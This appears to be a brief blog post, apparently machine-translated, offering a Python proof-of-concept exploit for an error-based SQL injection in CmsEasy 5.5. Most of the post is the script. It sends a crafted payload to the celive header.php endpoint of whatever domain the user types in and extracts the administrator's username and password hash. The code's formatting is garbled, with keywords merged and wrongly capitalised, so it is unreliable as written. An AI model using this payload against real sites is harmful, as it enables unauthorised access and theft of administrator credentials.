POC for a simple SQL injection

Recently in improving your programming ability, take some practical gadgets to practice. The script is a Python language that mainly involves module urllib,re.

Function: Verify CmsEasy5.5 account password

Experimental Source: Http://pan.baidu.com/s/1i4lAwBF

Build the environment: Phpstudy tried iis+php did not burst to the best use Phpstudy.

A vulnerability exists through browser access confirmation.

Implemented in Python.

Importurllib.requestImportUrllib.parseImportRedomain= Input ('Please enter a domain name or IP (example:www.xx.com/xxx.xxx.xx):') URL='http://%s/cmseasy/celive/live/header.php'%(domain) data= {        'Xajax':"Livemessage",        'Xajaxargs[0][name]':"1 ', (SELECT 1 from"        "(SELECT COUNT (*), concat (rand (0),"        "(select Concat (USERNAME,0X23,PASSWORD,MD5 (123))"        "From cmseasy_user where groupid=2 limit 1)) A"        "From information_schema.tables Group by a) b),"        "', ', ', ' , ' 1 ', ' 127.0.0.1 ', ' 2 ') #"}data= Urllib.parse.urlencode (data). Encode ('Utf-8') #将要post的数据进行编码Try: Req=urllib.request.Request (url,data) #get请求不需要写data参数, Post needs to write the data parameter response=Urllib.request.urlopen (req) HTML= Response.read (). Decode ('Utf-8')ifRe.findall (R'a801fc3202cb962ac59075b964b07152', HTML):Print("%s is vulnerable"%(URL)) HTML2= Re.findall (r'(? <=entry \ ' 1). * (? =a801fc3202cb962ac59075b964b07152)', HTML) #通过正则将账号密码匹配出来Print(HTML2)exceptException as err:Print('Not Found')

POC for a simple SQL injection